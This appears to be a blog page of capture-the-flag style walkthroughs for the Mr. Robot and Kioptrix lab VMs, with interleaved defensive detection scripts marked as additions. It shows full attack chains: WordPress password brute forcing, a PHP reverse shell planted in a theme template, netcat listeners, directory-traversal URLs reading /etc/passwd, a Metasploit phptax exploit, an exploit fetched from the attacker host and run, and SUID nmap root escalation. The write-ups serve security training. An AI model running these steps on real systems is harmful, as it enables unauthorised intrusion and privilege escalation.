Since I enjoy the show Mr. Robot, I had to try this VM out. The point of this game is to find 3 keys hidden in the VM. The link to download the VM is here. Let's get started!

Description from author:

Based on the show, Mr. Robot.

This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.

The VM isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

The Attack

Kali Linux machine: 192.168.182.147

Using the tool netdiscover, I found the victim VM to be 192.168.182.158

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Using nmap to do a version scan of the victim. Let's see what we find.

root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~# 

Looks like the victim is running Apache on ports 80/tcp and 443/tcp, so it's safe to assume we will be pwning a web server. Let's do some further scanning of the victim with nikto to find any vulnerabilities on the system.

root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

With nikto I was able to see that it is a WordPress site. I also see /wp-login.php, readme.html, license.txt, and robots.txt, which look pretty interesting. Before we check these files, let's browse the web server and see what it gives us.

The server greets us with a fancy intro, then a message and a list of commands we can run. None of them were that interesting except the join command, which asks for your email to "join" them. I didn't enter any email. Instead I looked into the files mentioned earlier. Let's check them out!

BINGO! Found the first key, which turned out to be 073403c8a58a1f80d943455fb30724b9, and also found a file called fsocity.dic, which turns out to be a dictionary file. Maybe we will use this later? For now let's save the file and continue with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

Well, according to the readme.html file the victim is running WordPress version 4.3.9. I checked the license.txt file but found nothing of interest there. Now let's check out /wp-login.php.

When viewing the page, I decided to see if there were any default credentials by entering admin:admin, but it said the username was invalid. However, having watched the show and knowing that the main character is Elliot, I decided to enter elliot as both username and password.

Looks like we are on to something! I got the password wrong, but WordPress confirms that elliot is a username on the site (its distinct "incorrect password" and "invalid username" messages leak which accounts exist). I will be doing a dictionary attack on the WordPress login using the fsocity.dic I acquired earlier. Before I do, I will try to make the password list smaller using the commands listed below. This makes the attack faster when trying to acquire elliot's password.

root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l
11451
root@kali:~/Documents# cat fsocity.dic | sort -u | uniq > Newfsocity.dic

I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter list to Newfsocity.dic. Now let's use wpscan to get elliot's password.

root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads# 

Nice! Elliot's password is ER28-0652. Now let's log in.


It worked! There are many things I could do from here, like checking which installed plugins are vulnerable and exploiting them, but since elliot is an Administrator, I am going to try to upload a PHP file to get a reverse shell.

Note: I got the php-reverse-shell from pentestmonkey; the link to the file is here. Before uploading the file, make sure to edit the ip and port variables. In my case my IP is 192.168.182.147 and the port I will use is 1234.

With that done, let's upload the file!

Well, it looks like WordPress is set up to block my PHP file from uploading. They probably have wp-config.php set up this way. It's all good, I still have another trick up my sleeve. Let's edit one of the theme files and put the code from the php-reverse-shell file there instead. Go to Appearance -> Editor -> 404 Template, add the code to the bottom, and click Update File. It should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

We have the listener set up and ready to go. Now I am going to use curl to request the 404 page, which runs the reverse shell and sends a shell back to our listener.

Triggering the reverse shell:

root@kali:~# curl http://192.168.182.158/404.php

On the listener side:

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...
192.168.182.158: inverse host lookup failed: Unknown host
connect to [192.168.182.147] from (UNKNOWN) [192.168.182.158] 41061
Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
 05:14:30 up  4:25,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
$ whoami
daemon
$ hostname
linux
$ 
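A defender's counterpart to the theme-editor trick used above, as an added example that is not from the original post: a scanner that walks a wp-content/themes directory and flags PHP templates calling the socket and process-spawning functions a reverse shell needs. The function list, the threshold and the sample theme tree (written to a temp directory) are constructed assumptions.

```python
"""Flag WordPress theme templates that contain injected shell-style PHP.

Added example (not from the original post). The theme tree scanned below is a
constructed sample written to a temp directory, so the script runs offline.
"""
import os
import re
import tempfile

# PHP functions a theme template has no business calling, but that a reverse
# shell or web shell needs: one to open a socket, one to spawn a process.
SUSPICIOUS_CALLS = (
    "fsockopen", "proc_open", "popen", "shell_exec", "passthru",
    "pcntl_exec", "system", "exec", "eval", "base64_decode",
)
# Match only a real call: the name must not be preceded by a word character
# or '$' (so execute_hook( and $exec( do not match) and must be followed by '('.
CALL_RE = re.compile(
    r"(?<![\w$])(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\("
)


def scan_php_file(path):
    """Return the distinct suspicious function names called in one file, sorted."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return sorted(set(CALL_RE.findall(fh.read())))


def scan_theme_dir(root, min_hits=2):
    """Map relative path -> suspicious calls for every .php file with >= min_hits.

    The default threshold of two distinct functions mirrors what a reverse
    shell needs (socket + process); a lone exec() in a helper would be noisy.
    """
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_php_file(full)
            if len(hits) >= min_hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_theme():
    """Write a constructed theme tree: a clean 404.php and a tampered copy."""
    root = tempfile.mkdtemp(prefix="wp-themes-")
    template = "<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n"
    for theme, extra in (
        ("twentyfifteen", ""),
        # Indicators only (undefined variables, not a working shell): the two
        # calls an appended reverse shell would have to make.
        ("twentyfifteen-tampered",
         "<?php $sock = fsockopen($host, $port); "
         "$proc = proc_open($cmd, $spec, $pipes); ?>\n"),
    ):
        os.makedirs(os.path.join(root, theme))
        with open(os.path.join(root, theme, "404.php"), "w") as fh:
            fh.write(template + extra)
    return root


if __name__ == "__main__":
    sample = build_sample_theme()
    for rel, calls in scan_theme_dir(sample).items():
        print(f"SUSPICIOUS {rel}: {', '.join(calls)}")
```

Pair it with file-integrity monitoring on the theme directory: the 404.php mtime changing while no theme update was deployed is the other half of the signal.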

Got a shell back as the user daemon. Let's see if we can spawn a tty shell. Netsec has a good blog post on that; I recommend you all check him out. His post on spawning a tty shell is here. I used the command below to spawn a tty shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that, I snooped around and found key 2 in the /home/robot/ directory, but got permission denied; I would have to be the robot user (or root) to view it. However, I did find a password.raw-md5 file. Maybe this is the password to log in as robot? Let's open the file.

$ ls
ls
key-2-of-3.txt	password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ 

BINGO! I have the password hash for robot. I used crackstation.net to crack it, which revealed the password to be abcdefghijklmnopqrstuvwxyz. Alright, let's log in as robot.

$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ 

Now that we are logged in as robot, let's get our 2nd key.

$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt	password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$ 

2nd Key:

822c73956184f694993bede3eb39f959

Got our 2nd key. Now let's try to get root! Let's find any files that have the SUID bit set.

$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 
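The same SUID check as an audit, added here as an example that is not part of the original post: it enumerates setuid files the way find -perm -4000 does and diffs them against an assumed golden-image baseline, so a stray /usr/local/bin/nmap stands out. The baseline set and the temp-directory sample tree are constructed assumptions.

```python
"""Audit setuid binaries against a baseline, the check behind `find / -perm -4000`.

Added example (not from the original post). EXPECTED_SUID is an assumed
baseline; the audited tree is a constructed temp directory so it runs unprivileged.
"""
import os
import stat
import tempfile

# Assumed golden-image baseline: the stock Ubuntu setuid binaries from the
# listing above. /usr/local/bin/nmap is deliberately not on it.
EXPECTED_SUID = {
    "/bin/ping", "/bin/ping6", "/bin/mount", "/bin/umount", "/bin/su",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def find_suid(root="/"):
    """Return every regular file under root with the setuid bit set."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: do not follow symlinks
            except OSError:
                continue                   # unreadable entry, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def audit_suid(root="/", expected=EXPECTED_SUID, prefix=""):
    """Return (unexpected, missing): setuid files not in the baseline, and
    baseline entries not found. prefix is stripped from reported paths so a
    test tree can stand in for '/'."""
    present = set()
    for path in find_suid(root):
        present.add(path[len(prefix):] if prefix and path.startswith(prefix) else path)
    return sorted(present - set(expected)), sorted(set(expected) - present)


def build_sample_tree():
    """Constructed filesystem slice: two setuid files and one normal file."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for rel, mode in (("bin/ping", 0o4755),
                      ("usr/local/bin/nmap", 0o4755),
                      ("usr/bin/id", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)               # setuid on our own file needs no root
    return root


if __name__ == "__main__":
    tree = build_sample_tree()
    unexpected, missing = audit_suid(tree, prefix=tree)
    print("unexpected setuid:", unexpected)
    print("missing from baseline:", missing)
```

Run it as root against "/" with no prefix on a real host; anything in the unexpected list deserves the same scrutiny the nmap binary gets here.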

Well, it looks like we can run nmap as root since it has the SUID bit set. Let's check the version of nmap to see if it still supports interactive mode.

$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$ 

Nmap is running version 3.81, which means we can run nmap in interactive mode. We can use this to execute shell commands and get a root shell. I found a helpful post on this called Why You Can't Un-Root a Compromised Machine. Check it out. Now let's get our root shell and our last key.

$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# 

We got a root shell (euid=0)! Let's go to the root directory and get our last key.

# cd /root
cd /root
# ls
ls
firstboot_done	key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4

Key 3:

04787ddef27c3dee1ee161b21670b4e4

Conclusion

Well, there you go, I got all 3 keys and a root shell on our victim VM. Had fun with this one since it dealt with Mr. Robot, which is a really cool show. I recommend it to anyone who is interested. That's it for now. Till next time!

Part 5 of 5 of the kioptrix series! This is a boot2root, or, for those not familiar with that term, a VM where the point of the game is to get a root shell. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification. The link to download the VM is here. Now let's get started!

Description from author:

Note from VulnHub

100% works with VMware player6, workstation 10 & fusion 6.

May have issues with VirtualBox. If this is the case, try this ‘fix’: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip (Step by Step screenshots for VirtualBox 4.3 & VMware Workstation 9)

About the VM

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Kioptrix VM 2014 download 825Megs

MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a

SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432

Waist line 32″

p.s.: Don’t forget to read my disclaimer…

Works out of the box with VMware workstation 10, player 6, fusion 6 (Can edit the vmx file to force a downgrade for an older version – see ‘kiop2014_fix.zip’). Has been known to work with Virtualbox 4.3 or higher… First thing: try setting it to a x64 machine. Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.

The Attack

Kali Linux machine: 192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.155

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

We have the IP of the victim. Now it's time to run nmap.

root@kali:~# nmap -sS -A -T4 192.168.182.155

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-19 20:08 CDT
Nmap scan report for 192.168.182.155
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   closed ssh
80/tcp   open   tcpwrapped
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
8080/tcp open   tcpwrapped
|_http-server-header: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
MAC Address: 00:0C:29:4A:09:D7 (VMware)
Device type: general purpose
Running: FreeBSD 7.X|8.X|9.X
OS CPE: cpe:/o:freebsd:freebsd:7 cpe:/o:freebsd:freebsd:8 cpe:/o:freebsd:freebsd:9
OS details: FreeBSD 7.0-RELEASE - 9.0-RELEASE
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.182.155

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.71 seconds
root@kali:~#

Found that the victim has ports 80 and 8080 open with Apache/2.2.21 running. It also looks like the victim is running FreeBSD. Let's see what's on the victim's website.



When browsing the site, all it showed was "It works!". When checking the page source, however, I found that the server is running a web app called pChart 2.1.3. It has multiple vulnerabilities listed on the Exploit Database, here. The one we are going to use is the directory traversal. More info on directory traversal from the OWASP site is here: Path Traversal and Testing Directory Traversal.

Also, what I found interesting was that when I browsed the server on port 8080, it said I was forbidden. Maybe this info will be useful later on. Well, for now we have enough info, let's exploit this VM.

Exploitation

We will be exploiting the pChart 2.1.3 web app using directory traversal. Entering the URL below, I will see if I can get the victim to display the /etc/passwd file. If it does, the victim is vulnerable to directory traversal and I should get the contents of /etc/passwd. Note: All I did was add ?Action=View&Script=%2f..%2f..%2fetc/passwd to the URL (after index.php). Looking at the info in the Exploit Database (exploit 31173) helps as well.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

Looks like it is vulnerable and we got our file. There is a mysql user and an ossec user, so it looks like the victim has a host intrusion detection system. Just some interesting info, but let's move on with our exploitation. We need to find a way in.

Let's see what we know. The victim is running FreeBSD and Apache/2.2.21. Let's check the config files for the Apache server and see what we get. Since this is a FreeBSD system, the Apache config file will be located at /usr/local/etc/apache22/httpd.conf.

Note: Just FYI for those of you wondering how I knew exactly where the Apache config files were located: I didn't. I did some online research and found a page which showed how to set up Apache on FreeBSD, located here. This helped me find the location of the Apache config files.

The URL below uses the same traversal to read the Apache config file. Let's see what we find.

http://192.168.182.155/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

There is an abundance of information in this config file, but if you keep looking toward the bottom of the file, it shows some very valuable data.
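The two traversal requests above leave a clear trace in the web server's access log. As an added example that is not from the original post, here is detection logic that parses Apache combined-format lines, canonicalises each query parameter (repeated percent-decoding, backslash to slash) and alerts when a decoded value contains a ".." path segment. The log lines are constructed to mirror the requests made above.

```python
"""Spot pChart-style path traversal (Script=%2f..%2f..%2fetc/passwd) in Apache access logs.

Added example (not from the original post). SAMPLE_LOG is constructed,
modelled on the two requests made against the pChart examples/index.php page.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

SAMPLE_LOG = [  # constructed sample lines
    '192.168.182.147 - - [19/Mar/2017:20:30:01 -0500] "GET /pChart2.1.3/examples/index.php?Action=View&Script=Example/bar.php HTTP/1.1" 200 2301 "-" "Mozilla/5.0"',
    '192.168.182.147 - - [19/Mar/2017:20:31:12 -0500] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1702 "-" "Mozilla/5.0"',
    '192.168.182.147 - - [19/Mar/2017:20:32:45 -0500] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf HTTP/1.1" 200 19406 "-" "Mozilla/5.0"',
    '192.168.182.147 - - [19/Mar/2017:20:33:00 -0500] "GET /index.html HTTP/1.1" 200 44 "-" "Mozilla/5.0"',
]


def fully_decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding before any comparison,
    so the check sees the same string the application would."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_params(target):
    """Names of query parameters whose decoded value has a '..' path segment."""
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = fully_decode(value).replace("\\", "/")
        if ".." in decoded.split("/"):
            hits.append(name)
    return hits


def scan_access_log(lines):
    """Return one alert dict per request that carries a traversal payload."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # malformed or non-combined line
        params = traversal_params(m["target"])
        if params:
            alerts.append({
                "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                "path": urlsplit(m["target"]).path, "params": params,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['ip']} traversal in {alert['params']} "
              f"-> {alert['path']} (HTTP {alert['status']})")
```

A 200 status on such a request, as in the sample, is the important distinction: a 403 or 404 means the application refused it, a 200 means the file was likely served.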

Well, look at this! The only way to access the web server on port 8080 is to set our user agent to Mozilla/4.0. Let's try to access port 8080 by changing the agent. I used this guide, Changing User Agent in Firefox: A Step by Step Guide, as well as this post, HOWTO: Change User Agent in Firefox/Iceweasel, to help me out. These guides helped a lot, but I'll show you how I did it. I opened up Iceweasel and put about:config in the URL bar.

Next, it prompts us with a warning, but don't worry, I know what I'm doing. Click on "I'll be careful, I promise!". Once in, right-click and go to New and then String. Enter the preference name general.useragent.override.

It will then ask for a string value. Make sure to enter Mozilla/4.0.

When all is done it should look like the picture below.

Now lets access the server on port 8080 and see what it gives us.

Looks like there is a link called phptax. Let's check it out.

Looks like phptax is some sort of tax program, and it's vulnerable: phptax 0.8 – Remote Code Execution. I also used searchsploit, which also said phptax was vulnerable to a remote code execution attack.

root@kali:~# searchsploit phptax
------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                             |  Path
                                                                                           | (/usr/share/exploitdb/platforms)
------------------------------------------------------------------------------------------- ----------------------------------
PhpTax pfilez Parameter Exec Remote Code Injection                                         | ./php/webapps/21833.rb
phptax 0.8 - Remote Code Execution Vulnerability                                           | ./php/webapps/21665.txt
PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution                       | ./php/webapps/25849.txt
------------------------------------------------------------------------------------------- ----------------------------------
root@kali:~# 

Metasploit even has a module for it. Let's fire up Metasploit for this attack.

root@kali:~# msfconsole

 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                        http://metasploit.pro |
|______________________________________________________________________________|


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.5-2016010401                   ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post        ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/phptax_exec 
msf exploit(phptax_exec) > show options

Module options (exploit/multi/http/phptax_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /phptax/         yes       The path to the web application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   PhpTax 0.8


msf exploit(phptax_exec) > set RHOST 192.168.182.155
RHOST => 192.168.182.155
msf exploit(phptax_exec) > set RPORT 8080
RPORT => 8080
msf exploit(phptax_exec) > run

[*] Started reverse TCP double handler on 192.168.182.147:4444 
[*] 192.168.182.1558080 - Sending request...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hVJmaYj76Ho5pii6;
[*] Writing to socket A
[*] Writing to socket B
[*] Command: echo 3T5yTlLQuaYzN6SB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from sockets...
[*] Reading from socket B
[*] Reading from socket B
[*] B: "hVJmaYj76Ho5pii6\r\n"
[*] B: "3T5yTlLQuaYzN6SB\r\n"
[*] Matching...
[*] Matching...
[*] A is input...
[*] A is input...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.155:26762) at 2017-03-20 00:00:40 -0500
[*] Command shell session 2 opened (192.168.182.147:4444 -> 192.168.182.155:58151) at 2017-03-20 00:00:40 -0500

id
uid=80(www) gid=80(www) groups=80(www)

Once in, I spawned an interactive shell using the command below, then ran uname -a to see what the victim was running.

/bin/sh -i
sh: can't access tty; job control turned off
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ 

The victim is running FreeBSD 9.0, which is vulnerable to the Intel SYSRET Kernel Privilege Escalation.

Next I will download the exploit (on Kali) and transfer the file using netcat. The command below sets up the listener, which serves exploit.c to whoever connects.

root@kali:~/Downloads# nc -lvp 1234 < exploit.c
listening on [any] 1234 ...

Changed directory to /tmp on the victim, then connected to the attack machine and retrieved the exploit.

$ cd /tmp
$ nc -nv 192.168.182.147 1234 > exploit.c
Connection to 192.168.182.147 1234 port [tcp/*] succeeded!

Compiled the exploit (the source file is exploit.c, as received above):

gcc -o exploit exploit.c
chmod a+x exploit

Ran the exploit

./exploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!

id
uid=0(root) gid=0(wheel) groups=0(wheel)

Conclusion

Well, this one took much more time than anticipated and was harder for me than it should've been, but what you have to do is tough it out and "TRY HARDER"! That's it for the kioptrix series. I will work on more VMs on vulnhub in the future and might work on some write-ups on the previous season of the National Cyber League, since it's coming up in April. We'll see. If you guys have any ideas or enjoyed the read then leave a comment. Thanks for the read. Till next time!

Part 4 of 5 of the kioptrix series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification. The point of the game is to find a way to get a root shell on the vulnerable machine. The link to download the VM is here. Now let's get started!

NOTE: When extracting the VM, I was only given a vmdk (virtual machine disk), which gave me problems when trying to open it with VMware. I used this guide, Create Workstation Virtual Machine Using Existing Virtual Disks, to help me out.

Description from author:

Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

Stays within the target audience of this site

Must be “realistic” (well kinda…)

Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.

